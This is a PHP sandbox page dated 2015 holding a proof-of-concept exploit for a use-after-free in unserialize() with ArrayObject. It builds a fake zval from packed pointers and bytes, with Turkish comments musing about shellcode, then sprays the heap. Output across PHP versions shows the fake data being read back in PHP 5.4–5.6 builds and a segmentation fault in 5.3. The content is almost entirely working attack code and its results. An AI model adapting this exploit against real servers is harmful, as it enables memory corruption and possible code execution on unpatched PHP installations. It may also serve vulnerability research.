@ 2015-08-30T02:16:07Z <?php
$fakezval = ptr2str(1234567);
$fakezval .= ptr2str(0xdfcb70+4-0xb8); //pointer address hardadir?
$fakezval .= "\x46\x45\x01\x01";
$fakezval .= "\x05";//shellcode hardadi?
$fakezval .= "\x23";//shellcode hardadi?
$fakezval .= "\x63";//shellcode hardadi?
$fakezval .= "\x00\x00\x00\x00\x00";
//$fakezval .= "\xbe\xf8\x52";
$fakezval.= "";
$inner = 'x:i:1234;a:0:{};m:a:0:{}';
$exploit = 'a:2:{i:0;C:11:"ArrayObject":'.strlen($inner).':{'.$inner.'}i:1;R:3;}';
$data = unserialize($exploit);
for ($i = 0; $i < 5; $i++) {
$v[$i] = $fakezval.$i;
}
var_dump($data);
function ptr2str($ptr)
{
$out = "";
for ($i = 0; $i < 8; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
?>
Enable javascript to submit You have javascript disabled. You will not be able to edit any code.
Output for 5.4.44 - 5.4.45 , 5.5.28 - 5.5.35 , 5.6.12 - 5.6.28 , 7.0.0 - 7.0.20 , 7.1.0 - 7.1.20 , 7.2.0 - 7.2.33 , 7.3.16 - 7.3.33 , 7.4.0 - 7.4.33 , 8.0.0 - 8.0.30 , 8.1.0 - 8.1.27 , 8.2.0 - 8.2.17 , 8.3.0 - 8.3.4 array(2) {
[0]=>
object(ArrayObject)#1 (1) {
["storage":"ArrayObject":private]=>
array(0) {
}
}
[1]=>
int(1234)
}
Output for 5.4.0 - 5.4.43 , 5.5.24 - 5.5.27 , 5.6.8 - 5.6.11 array(2) {
[0]=>
object(ArrayObject)#1 (1) {
["storage":"ArrayObject":private]=>
array(0) {
}
}
[1]=>
string(29) "�� ��� FE#c 1"
}
Output for 5.3.0 - 5.3.29 array(2) {
[0]=>
object(ArrayObject)#1 (1) {
["storage":"ArrayObject":private]=>
array(0) {
}
}
[1]=>
Process exited with code 139 . Output for 5.1.0 - 5.1.6 , 5.2.0 - 5.2.17 Warning: Class ArrayObject has no unserializer in /in/CESW1 on line 16
Notice: unserialize(): Error at offset 26 of 66 bytes in /in/CESW1 on line 16
bool(false)
Output for 4.3.2 - 4.3.11 , 4.4.0 - 4.4.9 , 5.0.0 - 5.0.5 Notice: unserialize(): Error at offset 9 of 66 bytes in /in/CESW1 on line 16
bool(false)
Output for 4.3.0 - 4.3.1 Notice: unserialize() [http://www.php.net/function.unserialize]: Error at offset 9 of 66 bytes in /in/CESW1 on line 16
bool(false)
preferences:dark mode live preview
220.31 ms | 401 KiB | 307 Q